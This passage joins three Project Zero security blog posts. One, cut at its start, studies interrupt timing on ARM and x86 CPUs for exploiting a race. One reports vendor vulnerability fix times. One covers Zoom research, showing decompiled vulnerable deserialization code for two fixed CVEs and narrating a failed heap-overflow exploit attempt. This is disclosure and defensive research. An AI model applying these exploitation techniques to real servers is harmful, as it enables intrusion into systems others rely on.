  400684:        91000421         add        x1, x1, #0x1

  400688:        9ac20820         udiv        x0, x1, x2

  40068c:        91006800         add        x0, x0, #0x1a

  400690:        91000400         add        x0, x0, #0x1

  400694:        91000442         add        x2, x2, #0x1

  400698:        91000421         add        x1, x1, #0x1

  40069c:        91000442         add        x2, x2, #0x1

  4006a0:        91000421         add        x1, x1, #0x1

  4006a4:        9ac20820         udiv        x0, x1, x2

  4006a8:        91006800         add        x0, x0, #0x1a

  4006ac:        91000400         add        x0, x0, #0x1

  4006b0:        91000442         add        x2, x2, #0x1

  4006b4:        91000421         add        x1, x1, #0x1

  4006b8:        91000442         add        x2, x2, #0x1

  4006bc:        91000421         add        x1, x1, #0x1

  4006c0:        17fffff0         b        400680 <main+0xe0>

The logged interrupt PCs had the following distribution on a slow in-order core:

A histogram of PC register values, where most instructions in the loop have roughly equal frequency, the instructions after udiv instructions have twice the frequency, and two other instructions have zero frequency.

and this distribution on a fast out-of-order core:

A histogram of PC register values, where the first instruction of the loop has very high frequency, the following 4 instructions have near-zero frequency, and the following instructions have low frequencies

As always, out-of-order (OOO) cores make everything weird, and the start of the loop seems to somehow "provide cover" for the following instructions; but on the in-order core, we can see that more interrupts arrive after the slow udiv instructions. So apparently, when one of those is executing while an interrupt arrives, it continues executing and doesn't get aborted somehow?

With the following loop, which has a LDR instruction mixed in that accesses a memory location that is constantly being modified by another thread:

  4006a0:        91000442         add        x2, x2, #0x1

  4006a4:        91000421         add        x1, x1, #0x1

  4006a8:        9ac20820         udiv        x0, x1, x2

  4006ac:        91006800         add        x0, x0, #0x1a

  4006b0:        91000400         add        x0, x0, #0x1

  4006b4:        91000442         add        x2, x2, #0x1

  4006b8:        91000421         add        x1, x1, #0x1

  4006bc:        91000442         add        x2, x2, #0x1

  4006c0:        91000421         add        x1, x1, #0x1

  4006c4:        9ac20820         udiv        x0, x1, x2

  4006c8:        91006800         add        x0, x0, #0x1a

  4006cc:        91000400         add        x0, x0, #0x1

  4006d0:        91000442         add        x2, x2, #0x1

  4006d4:        f9400061         ldr        x1, [x3]

  4006d8:        91000421         add        x1, x1, #0x1

  4006dc:        91000442         add        x2, x2, #0x1

  4006e0:        91000421         add        x1, x1, #0x1

  4006e4:        17ffffef         b        4006a0 <main+0x100>

the cache-missing loads obviously have a large influence on the timing. On the in-order core:

A histogram of interrupt instruction pointers, showing that most interrupts are delivered with PC pointing to the instruction after the high-latency load instruction.

On the OOO core:

A similar histogram as the previous one, except that an even larger fraction of interrupt PCs are after the high-latency load instruction.

What is interesting to me here is that the timer interrupts seem to again arrive after the slow load - implying that if an interrupt arrives while a slow memory access is in progress, the interrupt handler may not get to execute until the memory access has finished? (Unless maybe on the OOO core the interrupt handler can start speculating already? I wouldn't really expect that, but could imagine it.)

On an X86 Skylake CPU, we can do a similar test:

    11b8:        48 83 c3 01                  add    $0x1,%rbx

    11bc:        48 83 c0 01                  add    $0x1,%rax

    11c0:        48 01 d8                     add    %rbx,%rax

    11c3:        48 83 c3 01                  add    $0x1,%rbx

    11c7:        48 83 c0 01                  add    $0x1,%rax

    11cb:        48 01 d8                     add    %rbx,%rax

    11ce:        48 03 02                     add    (%rdx),%rax

    11d1:        48 83 c0 01                  add    $0x1,%rax

    11d5:        48 83 c3 01                  add    $0x1,%rbx

    11d9:        48 01 d8                     add    %rbx,%rax

    11dc:        48 83 c3 01                  add    $0x1,%rbx

    11e0:        48 83 c0 01                  add    $0x1,%rax

    11e4:        48 01 d8                     add    %rbx,%rax

    11e7:        eb cf                        jmp    11b8 <main+0xf8>

with a similar result:

A histogram of interrupt instruction pointers, showing that almost all interrupts were delivered with RIP pointing to the instruction after the high-latency load.

This means that if the first access to the file terminated our race window (which is not the case), we probably wouldn't be able to win the race by making the access to the file slow - instead we'd have to slow down one of the operations before that. (But note that I have only tested simple loads, not stores or read-modify-write operations here.)

A walk through Project Zero metrics

Posted by Ryan Schoen, Project Zero

tl;dr

  • In 2021, vendors took an average of 52 days to fix security vulnerabilities reported from Project Zero. This is a significant acceleration from an average of about 80 days 3 years ago.
  • In addition to the average now being well below the 90-day deadline, we have also seen a dropoff in vendors missing the deadline (or the additional 14-day grace period). In 2021, only one bug exceeded its fix deadline, though 14% of bugs required the grace period.
  • Differences in the amount of time it takes a vendor/product to ship a fix to users reflects their product design, development practices, update cadence, and general processes towards security reports. We hope that this comparison can showcase best practices, and encourage vendors to experiment with new policies.
  • This data aggregation and analysis is relatively new for Project Zero, but we hope to do it more in the future. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities, as well as more data sharing and transparency in general.

Overview

For nearly ten years, Google’s Project Zero has been working to make it more difficult for bad actors to find and exploit security vulnerabilities, significantly improving the security of the Internet for everyone. In that time, we have partnered with folks across industry to transform the way organizations prioritize and approach fixing security vulnerabilities and updating people’s software.

To help contextualize the shifts we are seeing the ecosystem make, we looked back at the set of vulnerabilities Project Zero has been reporting, how a range of vendors have been responding to them, and then attempted to identify trends in this data, such as how the industry as a whole is patching vulnerabilities faster.

For this post, we look at fixed bugs that were reported between January 2019 and December 2021 (2019 is the year we made changes to our disclosure policies and also began recording more detailed metrics on our reported bugs). The data we'll be referencing is publicly available on the Project Zero Bug Tracker, and on various open source project repositories (in the case of the data used below to track the timeline of open-source browser bugs).

There are a number of caveats with our data, the largest being that we'll be looking at a small number of samples, so differences in numbers may or may not be statistically significant. Also, the direction of Project Zero's research is almost entirely influenced by the choices of individual researchers, so changes in our research targets could shift metrics as much as changes in vendor behaviors could. As much as possible, this post is designed to be an objective presentation of the data, with additional subjective analysis included at the end.

The data!

Between 2019 and 2021, Project Zero reported 376 issues to vendors under our standard 90-day deadline. 351 (93.4%) of these bugs have been fixed, while 14 (3.7%) have been marked as WontFix by the vendors. 11 (2.9%) other bugs remain unfixed, though at the time of this writing 8 have passed their deadline to be fixed; the remaining 3 are still within their deadline to be fixed. Most of the vulnerabilities are clustered around a few vendors, with 96 bugs (26%) being reported to Microsoft, 85 (23%) to Apple, and 60 (16%) to Google.

Deadline adherence

Once a vendor receives a bug report under our standard deadline, they have 90 days to fix it and ship a patched version to the public. The vendor can also request a 14-day grace period if the vendor confirms they plan to release the fix by the end of that total 104-day window.

In this section, we'll be taking a look at how often vendors are able to hit these deadlines. The table below includes all bugs that have been reported to the vendor under the 90-day deadline since January 2019 and have since been fixed, for vendors with the most bug reports in the window.

Deadline adherence and fix time 2019-2021, by bug report volume

Vendor

Total bugs

Fixed by day 90

Fixed during
grace period

Exceeded deadline

& grace period

Avg days to fix

Apple

84

73 (87%)

7 (8%)

4 (5%)

69

Microsoft

80

61 (76%)

15 (19%)

4 (5%)

83

Google

56

53 (95%)

2 (4%)

1 (2%)

44

Linux

25

24 (96%)

0 (0%)

1 (4%)

25

Adobe

19

15 (79%)

4 (21%)

0 (0%)

65

Mozilla

10

9 (90%)

1 (10%)

0 (0%)

46

Samsung

10

8 (80%)

2 (20%)

0 (0%)

72

Oracle

7

3 (43%)

0 (0%)

4 (57%)

109

Others*

55

48 (87%)

3 (5%)

4 (7%)

44

TOTAL

346

294 (84%)

34 (10%)

18 (5%)

61

* For completeness, the vendors included in the "Others" bucket are Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Node.js, opencontainers, QT, Qualcomm, RedHat, Reliance, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

Overall, the data show that almost all of the big vendors here are coming in under 90 days, on average. The bulk of fixes during a grace period come from Apple and Microsoft (22 out of 34 total).

Vendors have exceeded the deadline and grace period about 5% of the time over this period. In this slice, Oracle has exceeded at the highest rate, but admittedly with a relatively small sample size of only about 7 bugs. The next-highest rate is Microsoft, having exceeded 4 of their 80 deadlines.

Average number of days to fix bugs across all vendors is 61 days. Zooming in on just that stat, we can break it out by year:

Bug fix time 2019-2021, by bug report volume

Vendor

Bugs in 2019

(avg days to fix)

Bugs in 2020

(avg days to fix)

Bugs in 2021

(avg days to fix)

Apple

61 (71)

13 (63)

11 (64)

Microsoft

46 (85)

18 (87)

16 (76)

Google

26 (49)

13 (22)

17 (53)

Linux

12 (32)

8 (22)

5 (15)

Others*

54 (63)

35 (54)

14 (29)

TOTAL

199 (67)

87 (54)

63 (52)

* For completeness, the vendors included in the "Others" bucket are Adobe, Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Mozilla, Node.js, opencontainers, Oracle, QT, Qualcomm, RedHat, Reliance, Samsung, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

From this, we can see a few things: first of all, the overall time to fix has consistently been decreasing, but most significantly between 2019 and 2020. Microsoft, Apple, and Linux overall have reduced their time to fix during the period, whereas Google sped up in 2020 before slowing down again in 2021. Perhaps most impressively, the others not represented on the chart have collectively cut their time to fix in more than half, though it's possible this represents a change in research targets rather than a change in practices for any particular vendor.

Finally, focusing on just 2021, we see:

  • Only 1 deadline exceeded, versus an average of 9 per year in the other two years
  • The grace period used 9 times (notably with half being by Microsoft), versus the slightly lower average of 12.5 in the other years

Mobile phones

Since the products in the previous table span a range of types (desktop operating systems, mobile operating systems, browsers), we can also focus on a particular, hopefully more apples-to-apples comparison: mobile phone operating systems.

Vendor

Total bugs

Avg fix time

iOS

76

70

Android (Samsung)

10

72

Android (Pixel)

6

72

The first thing to note is that it appears that iOS received remarkably more bug reports from Project Zero than any flavor of Android did during this time period, but rather than an imbalance in research target selection, this is more a reflection of how Apple ships software. Security updates for "apps" such as iMessage, Facetime, and Safari/WebKit are all shipped as part of the OS updates, so we include those in the analysis of the operating system. On the other hand, security updates for standalone apps on Android happen through the Google Play Store, so they are not included here in this analysis.

Despite that, all three vendors have an extraordinarily similar average time to fix. With the data we have available, it's hard to determine how much time is spent on each part of the vulnerability lifecycle (e.g. triage, patch authoring, testing, etc). However, open-source products do provide a window into where time is spent.

Browsers

For most software, we aren't able to dig into specifics of the timeline. Specifically: after a vendor receives a report of a security issue, how much of the "time to fix" is spent between the bug report and landing the fix, and how much time is spent between landing that fix and releasing a build with the fix? The one window we do have is into open-source software, and specific to the type of vulnerability research that Project Zero does, open-source browsers.

Fix time analysis for open-source browsers, by bug volume

Browser

Bugs

Avg days from bug report to public patch

Avg days from public patch to release

Avg days from bug report to release

Chrome

40

5.3

24.6

29.9

WebKit

27

11.6

61.1

72.7

Firefox

8

16.6

21.1

37.8

Total

75

8.8

37.3

46.1

We can also take a look at the same data, but with each bug spread out in a histogram. In particular, the histogram of the amount of time from a fix being landed in public to that fix being shipped to users shows a clear story (in the table above, this corresponds to "Avg days from public patch to release" column:

Histogram showing the distributions of time from a fix landing in public to a fix shipping for Firefox, Webkit, and Chrome. The fact that Webkit is still on the higher end of the histogram tells us that most of their time is spent shipping the fixed build after the fix has landed.

The table and chart together tell us a few things:

Chrome is currently the fastest of the three browsers, with time from bug report to releasing a fix in the stable channel in 30 days. The time to patch is very fast here, with just an average of 5 days between the bug report and the patch landing in public. The time for that patch to be released to the public is the bulk of the overall time window, though overall we still see the Chrome (blue) bars of the histogram toward the left side of the histogram. (Important note: despite being housed within the same company, Project Zero follows the same policies and procedures with Chrome that an external security researcher would follow. More information on that is available in our Vulnerability Disclosure FAQ.)

Firefox comes in second in this analysis, though with a relatively small number of data points to analyze. Firefox releases a fix on average in 38 days. A little under half of that is time for the fix to land in public, though it's important to note that Firefox intentionally delays committing security patches to reduce the amount of exposure before the fix is released. Once the patch has been made public, it releases the fixed build on average a few days faster than Chrome – with the vast majority of the fixes shipping 10-15 days after their public patch.

WebKit is the outlier in this analysis, with the longest number of days to release a patch at 73 days. Their time to land the fix publicly is in the middle between Chrome and Firefox, but unfortunately this leaves a very long amount of time for opportunistic attackers to find the patch and exploit it prior to the fix being made available to users. This can be seen by the Apple (red) bars of the second histogram mostly being on the right side of the graph, and every one of them except one being past the 30-day mark.

Analysis, hopes, and dreams

Overall, we see a number of promising trends emerging from the data. Vendors are fixing almost all of the bugs that they receive, and they generally do it within the 90-day deadline plus the 14-day grace period when needed. Over the past three years vendors have, for the most part, accelerated their patch effectively reducing the overall average time to fix to about 52 days. In 2021, there was only one 90-day deadline exceeded. We suspect that this trend may be due to the fact that responsible disclosure policies have become the de-facto standard in the industry, and vendors are more equipped to react rapidly to reports with differing deadlines. We also suspect that vendors have learned best practices from each other, as there has been increasing transparency in the industry.

One important caveat: we are aware that reports from Project Zero may be outliers compared to other bug reports, in that they may receive faster action as there is a tangible risk of public disclosure (as the team will disclose if deadline conditions are not met) and Project Zero is a trusted source of reliable bug reports. We encourage vendors to release metrics, even if they are high level, to give a better overall picture of how quickly security issues are being fixed across the industry, and continue to encourage other security researchers to share their experiences.

For Google, and in particular Chrome, we suspect that the quick turnaround time on security bugs is in part due to their rapid release cycle, as well as their additional stable releases for security updates. We're encouraged by Chrome's recent switch from a 6-week release cycle to a 4-week release cycle. On the Android side, we see the Pixel variant of Android releasing fixes about on par with the Samsung variants as well as iOS. Even so, we encourage the Android team to look for additional ways to speed up the application of security updates and push that segment of the industry further.

For Apple, we're pleased with the acceleration of patches landing, as well as the recent lack of use of grace periods as well as lack of missed deadlines. For WebKit in particular, we hope to see a reduction in the amount of time it takes between landing a patch and shipping it out to users, especially since WebKit security affects all browsers used in iOS, as WebKit is the only browser engine permitted on the iOS platform.

For Microsoft, we suspect that the high time to fix and Microsoft's reliance on the grace period are consequences of the monthly cadence of Microsoft's "patch Tuesday" updates, which can make it more difficult for development teams to meet a disclosure deadline. We hope that Microsoft might consider implementing a more frequent patch cadence for security issues, or finding ways to further streamline their internal processes to land and ship code quicker.

Moving forward

This post represents some number-crunching we've done of our own public data, and we hope to continue this going forward. Now that we've established a baseline over the past few years, we plan to continue to publish an annual update to better understand how the trends progress.

To that end, we'd love to have even more insight into the processes and timelines of our vendors. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities. Through more transparency, information sharing, and collaboration across the industry, we believe we can learn from each other's best practices, better understand existing difficulties and hopefully make the internet a safer place for all.

Zooming in on Zero-click Exploits

Posted by Natalie Silvanovich, Project Zero


Zoom is a video conferencing platform that has gained popularity throughout the pandemic. Unlike other video conferencing systems that I have investigated, where one user initiates a call that other users must immediately accept or reject, Zoom calls are typically scheduled in advance and joined via an email invitation. In the past, I hadn’t prioritized reviewing Zoom because I believed that any attack against a Zoom client would require multiple clicks from a user. However, a zero-click attack against the Windows Zoom client was recently revealed at Pwn2Own, showing that it does indeed have a fully remote attack surface. The following post details my investigation into Zoom.

This analysis resulted in two vulnerabilities being reported to Zoom. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

Zoom Attack Surface Overview

Zoom’s main feature is multi-user conference calls called meetings that support a variety of features including audio, video, screen sharing and in-call text messages. There are several ways that users can join Zoom meetings. To start, Zoom provides full-featured installable clients for many platforms, including Windows, Mac, Linux, Android and iPhone. Users can also join Zoom meetings using a browser link, but they are able to use fewer features of Zoom. Finally, users can join a meeting by dialing phone numbers provided in the invitation on a touch-tone phone, but this only allows access to the audio stream of a meeting. This research focused on the Zoom client software, as the other methods of joining calls use existing device features.

Zoom clients support several communication features other than meetings that are available to a user’s Zoom Contacts. A Zoom Contact is a user that another user has added as a contact using the Zoom user interface. Both users must consent before they become Zoom Contacts. Afterwards, the users can send text messages to one another outside of meetings and start channels for persistent group conversations. Also, if either user hosts a meeting, they can invite the other user in a manner that is similar to a phone call: the other user is immediately notified and they can join the meeting with a single click. These features represent the zero-click attack surface of Zoom. Note that this attack surface is only available to attackers that have convinced their target to accept them as a contact. Likewise, meetings are part of the one-click attack surface only for Zoom Contacts, as other users need to click several times to enter a meeting.

That said, it’s likely not that difficult for a dedicated attacker to convince a target to join a Zoom call even if it takes multiple clicks, and the way some organizations use Zoom presents interesting attack scenarios. For example, many groups host public Zoom meetings, and Zoom supports a paid Webinar feature where large groups of unknown attendees can join a one-way video conference. It could be possible for an attacker to join a public meeting and target other attendees. Zoom also relies on a server to transmit audio and video streams, and end-to-end encryption is off by default. It could be possible for an attacker to compromise Zoom’s servers and gain access to meeting data.

Zoom Messages

I started out by looking at the zero-click attack surface of Zoom. Loading the Linux client into IDA, it appeared that a great deal of its server communication occurred over XMPP. Based on strings in the binary, it was clear that XMPP parsing was performed using a library called gloox. I fuzzed this library using AFL and other coverage-guided fuzzers, but did not find any vulnerabilities. I then looked at how Zoom uses the data provided over XMPP.

XMPP traffic seemed to be sent over SSL, so I located the SSL_write function in the binary based on log strings, and hooked it using Frida. The output contained many XMPP stanzas (messages) as well as other network traffic, which I analyzed to determine how XMPP is used by Zoom. XMPP is used for most communication between Zoom clients outside of meetings, such as messages and channels, and is also used for signaling (call set-up) when a Zoom Contact invites another Zoom Contact to a meeting.

I spent some time going through the client binary trying to determine how the client processes XMPP, for example, if a stanza contains a text message, how is that message extracted and displayed in the client. Even though the Zoom client contains many log strings, this was challenging, and I eventually asked my teammate Ned Williamson for help locating symbols for the client. He discovered that several old versions of the Android Zoom SDK contained symbols. While these versions are roughly five years old, and do not present a complete view of the client as they only include some libraries that it uses, they were immensely helpful in understanding how Zoom uses XMPP.

Application-defined tags can be added to gloox’s XMPP parser by extending the class StanzaExtension and implementing the method newInstance to define how the tag is converted into a C++ object. Parsed XMPP stanzas are then processed using the MessageHandler class. Application developers extend this class, implementing the method handleMessage with code that performs application functionality based on the contents of the stanza received. Zoom implements its XMPP handling in CXmppIMSession::handleMessage, which is a large function that is an entrypoint to most messaging and calling features. The final processing stage of many XMPP tags is in the class ns_zoom_messager::CZoomMMXmppWrapper, which contains many methods starting with ‘On’ that handle specific events. I spent a fair amount of time analyzing these code paths, but didn’t find any bugs. Interestingly, Thijs Alkemade and Daan Keuper released a write-up of their Pwn2Own bug after I completed this research, and it involved a vulnerability in this area.

RTP Processing

Afterwards, I investigated how Zoom clients process audio and video content. Like all other video conferencing systems that I have analyzed, it uses Real-time Transport Protocol (RTP) to transport this data. Based on log strings included in the Linux client binary, Zoom appears to use a branch of WebRTC for audio. Since I have looked at this library a great deal in previous posts, I did not investigate it further. For video, Zoom implements its own RTP processing and uses a custom underlying codec named Zealot (libzlt).

Analyzing the Linux client in IDA, I found what I believed to be the video RTP entrypoint, and fuzzed it using afl-qemu. This resulted in several crashes, mostly in RTP extension processing. I tried modifying the RTP sent by a client to reproduce these bugs, but it was not received by the device on the other side and I suspected the server was filtering it. I tried to get around this by enabling end-to-end encryption, but Zoom does not encrypt RTP headers, only the contents of RTP packets (as is typical of most RTP implementations).

Curious about how Zoom server filtering works, I decided to set up Zoom On-Premises Deployment. This is a Zoom product that allows customers to set up on-site servers to process their organization’s Zoom calls. This required a fair amount of configuration, and I ended up reaching out to the Zoom Security Team for assistance. They helped me get it working, and I greatly appreciate their contribution to this research.

Zoom On-Premises Deployments consist of two hosts: the controller and the Multimedia Router (MMR). Analyzing the traffic to each server, it became clear that the MMR is the host that transmits audio and video content between Zoom clients. Loading the code for the MMR process into IDA, I located where RTP is processed, and it indeed parses the extensions as a part of its forwarding logic and verifies them correctly, dropping any RTP packets that are malformed.

The code that processes RTP on the MMR appeared different than the code that I fuzzed on the device, so I set up fuzzing on the server code as well. This was challenging, as the code was in the MMR binary, which was not compiled as a relocatable binary (more on this later). This meant that I couldn’t load it as a library and call into specific offsets in the binary as I usually do to fuzz binaries that don’t have source code available. Instead, I compiled my own fuzzing stub that called the function I wanted to fuzz as a relocatable that defined fopen, and loaded it using LD_PRELOAD when executing the MMR binary. Then my code would take control of execution the first time that the MMR binary called fopen, and was able to call the function being fuzzed.

This approach has a lot of downsides, the biggest being that the fuzzing stub can’t accept command line parameters, execution is fairly slow and a lot of fuzzing tools don’t honor LD_PRELOAD on the target. That said, I was able to fuzz with code coverage using Mateusz Jurczyk’s excellent DrSanCov, with no results.

Packet Processing

When analyzing RTP traffic, I noticed that both Zoom clients and the MMR server process a great deal of packets that didn’t appear to be RTP or XMPP. Looking at the SDK with symbols, one library appeared to do a lot of serialization: libssb_sdk.so. This library contains a great deal of classes with the methods load_from and save_to defined with identical declarations, so it is likely that they all implement the same virtual class.

One parameter to the load_from methods is an object of class msg_db_t,  which implements a buffer that supports reading different data types. Deserialization is performed by load_from methods by reading needed data from the msg_db_t object, and serialization is performed by save_to methods by writing to it.

After hooking a few save_to methods with Frida and comparing the written output to data sent with SSL_write, it became clear that these serialization classes are part of the remote attack surface of Zoom. Reviewing each load_from method, several contained code similar to the following (from ssb::conf_send_msg_req::load_from).

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(

msg_db, &this->str_len, consume_bytes, error_out);

  str_len = this->str_len;

  if ( str_len )

  {

    mem = operator new[](str_len);

    out_len = 0;

    this->str_mem = mem;

    ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read_str_with_len(msg_db, mem, &out_len);

read_str_with_len is defined as follows.

int __fastcall ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read_str_with_len(msg_db_t* msg, signed __int8 *mem,

unsigned int *len)

{

  if ( !msg->invalid )

  {

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(msg, len, (int)len, 0);

    if ( !msg->invalid )

    {

      if ( *len )

        ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::

read(msg, mem, *len, 0);

    }

  }

  return msg;

}

Note that the string buffer is allocated based on a length read from the msg_db_t buffer, but then a second length is read from the buffer and used as the length of the string that is read. This means that if an attacker could manipulate the contents of the msg_db_t buffer, they could specify the length of the buffer allocated, and overwrite it with any length of data (up to a limit of 0x1FFF bytes, not shown in the code snippet above).

I tested this bug by hooking SSL_write with Frida, and sending the malformed packet, and it caused the Zoom client to crash on a variety of platforms. This vulnerability was assigned CVE-2021-34423 and fixed on November 24, 2021.

Looking at the code for the MMR server, I noticed that ssb::conf_send_msg_req::load_from, the class the vulnerability occurs in was also present on the MMR server. Since the MMR forwards Zoom meeting traffic from one client to another, it makes sense that it might also deserialize this packet type. I analyzed the MMR code in IDA, and found that deserialization of this class only occurs during Zoom Webinars. I purchased a Zoom Webinar license, and was able to crash my own Zoom MMR server by sending this packet. I was not willing to test a vulnerability of this type on Zoom’s public MMR servers, but it seems reasonably likely that the same code was also in Zoom’s public servers.

Looking further at deserialization, I noticed that all deserialized objects contain an optional field of type ssb::dyna_para_table_t, which is basically a properties table that allows a map of name strings to variant objects to be included in the deserialized object. The variants in the table are implemented by the structure ssb::variant_t, as follows.

struct variant{

char type;

short length;

var_data data;

};

union var_data{

        char i8;

        char* i8_ptr;

        short i16;

        short* i16_ptr;

        int i32;

        int* i32_ptr;

        long long i64;

        long long i64*;

};

The value of the type field corresponds to the width of the variant data (1 for 8-bit, 2 for 16-bit, 3 for 32-bit and 4 four 64-bit). The length field specifies whether the variant is an array and its length. If it has the value 0, the variant is not an array, and a numeric value is read from the data field based on its type. If the length field has any other value, the data field is cast to a pointer, an array of that size is read.

My immediate concern with this implementation was that it could be prone to type confusion. One possibility is that a numeric value could be confused with an array pointer, which would allow an attacker to create a variant with a pointer that they specify. However, both the client and MMR perform very aggressive type checks on variants they treat as arrays. Another possibility is that a pointer could be confused with a numeric value. This could allow an attacker to determine the address of a buffer they control if the value is ever returned to the attacker. I found a few locations in the MMR code where a pointer is converted to a numeric value in this way and logged, but nowhere that an attacker could obtain the incorrectly cast value. Finally, I looked at how array data is handled, and I found that there are several locations where byte array variants are converted to strings, however not all of them checked that the byte array has a null terminator. This meant that if these variants were converted to strings, the string could contain the contents of uninitialized memory.

Most of the time, packets sent to the MMR by one user are immediately forwarded to other users without being deserialized by the server. For some bugs, this is a useful feature, for example, it is what allows CVE-2021-34423 discussed earlier to be triggered on a client. However, an information leak in variants needs to occur on the server to be useful to an attacker. When a client deserializes an incoming packet, it is for use on the device, so even if a deserialized string contains sensitive information, it is unlikely that this information will be transmitted off the device. Meanwhile, the MMR exists expressly to transmit information from one user to another, so if a string gets deserialized, there is a reasonable chance that it gets sent to another user, or alters server behavior in an observable way. So, I tried to find a way to get the server to deserialize a variant and convert it to a string. I eventually figured out that when a user logs into Zoom in a browser, the browser can’t process serialized packets, so the MMR must convert them to strings so they can be accessed through web requests. Indeed, I found that if I removed the null terminator from the user_name variant, it would be converted to a string and sent to the browser as the user’s display name.

The vulnerability was assigned CVE-2021-34424 and fixed on November 24, 2021. I tested it on my own MMR as well as Zoom’s public MMR, and it worked and returned pointer data in both cases.

Exploit Attempt

I attempted to exploit my local MMR server with these vulnerabilities, and while I had success with portions of the exploit, I was not able to get it working. I started off by investigating the possibility of creating a client that could trigger each bug outside of the Zoom client, but client authentication appeared complex and I lacked symbols for this part of the code, so I didn’t pursue this as I suspected it would be very time-consuming. Instead, I analyzed the exploitability of the bugs by triggering them from a Linux Zoom client hooked with Frida.

I started off by investigating the impact of heap corruption on the MMR process. MMR servers run on CentOS 7, which uses a modern glibc heap, so exploiting heap unlinking did not seem promising. I looked into overwriting the vtable of a C++ object allocated on the heap instead.

 

I wrote several Frida scripts that hooked malloc on the server, and used them to monitor how incoming traffic affects allocation. It turned out that there are not many ways for an attacker to control memory allocation on an MMR server that are useful for exploiting this vulnerability. There are several packet types that an attacker can send to the server that cause memory to be allocated on the heap and then freed when processing is finished, but not as many where the attacker can trigger both allocation and freeing. Moreover, the MMR server performs different types of processing in separate threads that use unique heap arenas, so many areas of the code where this type of allocation is likely to occur, such as connection management, allocate memory in a different heap arena than the thread where the bug occurs. The only such allocations I could find that were made in the same arena were related to meeting set-up: when a user joins a meeting, certain objects are allocated on the heap, which are then freed when they leave the meeting. Unfortunately, these allocations are difficult to automate as they require many unique users accounts in order for the allocation to be performed repeatedly, and allocation takes an observable amount of time (seconds).

I eventually wrote Frida scripts that looked for free chunks of unusual sizes that bordered C++ objects with vtables during normal MMR operation. There were a few allocation sizes that met this criteria, and since CVE-2021-34423 allows for the size of the buffer that is overflowed to be specified by the attacker, I was able to corrupt the memory of the adjacent object. Unfortunately, heap verification was very robust, so in most cases, the MMR process would crash due to a heap verification error before a virtual call was made on the corrupted object. I eventually got around this by focusing on allocation sizes that are small enough to be stored in fastbins by the heap, as heap chunks that are stored in fastbins do not contain verifiable heap metadata. Chunks of size 58 turned out to be the best choice, and by triggering the bug with an allocation of that size, I was able to control the pointer of a virtual call about one in ten times I triggered the bug.

The next step was to figure out where to point the pointer I could control, and this turned out to be more challenging than I expected. The MMR process did not have ASLR enabled when I did this research (it was enabled in version 4.6.20211128.136, which was released on November 28, 2021), so I was hoping to find a series of locations in the binary that this call could be directed to that would eventually end in a call to execv with controllable parameters, as the MMR initialization code contains many calls to this function. However, there were a few features of the server that made this difficult. First, only the MMR binary was loaded at a fixed location. The heap and system libraries were not, so only the actual MMR code was available without bypassing ASLR. Second, if the MMR crashes, it has an exponential backoff which culminates in it respawning every hour on the hour. This limits how many exploit attempts an attacker has. It is realistic that an attacker might spend days or even weeks trying to exploit a server, but this still limits them to hundreds of attempts. This means that any exploit of an MMR server would need to be at least somewhat reliable, so certain techniques that require a lot of attempts, such as allocating a large buffer on the heap and trying to guess its location were not practical.

I eventually decided that it would be helpful to allocate a buffer on the heap with controlled contents and determine its location. This would make the exploit fairly reliable in the case that the overflow successfully leads to a virtual call, as the buffer could be used as a fake vtable, and also contain strings that could be used as parameters to execv. I tried using CVE-2021-34424 to leak such an address, but wasn’t able to get this working.

This bug allows the attacker to provide a string of any size, which then gets copied out of bounds up until a null character is encountered in memory, and then returned. It is possible for CVE-2021-34424 to return a heap pointer, as the MMR maps the heap that gets corrupted at a low address that does not usually contain null bytes, however, I could not find a way to force a specific heap pointer to be allocated next to the string buffer that gets copied out of bounds. C++ objects used by the MMR tend to be virtual objects, so the first 64 bits of most object allocations are a vtable which contains null bytes, ending the copy. Other allocated structures, especially larger ones, tend to contain non-pointer data. I was able to get this bug to return heap pointers by specifying a string that was less than 64 bits long, so the nearby allocations were sometimes the pointers themselves, but allocations of this size are so frequent it was not possible to ascertain what heap data they pointed to with any accuracy.

One last idea I had was to use another type confusion bug to leak a pointer to a controllable buffer. There is one such bug in the processing of deserialized ssb::kv_update_req objects. This object’s ssb::dyna_para_table_t table contains a variant named nodeid which represents the specific Zoom client that the message refers to. If an attacker changes this variant to be of type array instead of a 32-bit integer, the address of the pointer to this array will be logged as a string. I tried to combine CVE-2021-34424 with this bug, hoping that it might be possible for the leaked data to be this log string that contains pointer information. Unfortunately, I wasn’t able to get this to work because of timing: the log entry needs to be logged at almost exactly the same time as the bug is triggered so that the log data is still in memory, and I wasn't able to send packets fast enough. I suspect it might be possible for this to work with improved automation, as I was relying on clients hooked with Frida and browsers to interact with the Zoom server, but I decided not to pursue this as it would require tooling that would take substantial effort to develop.

Conclusion

I performed a security analysis of Zoom and reported two vulnerabilities. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

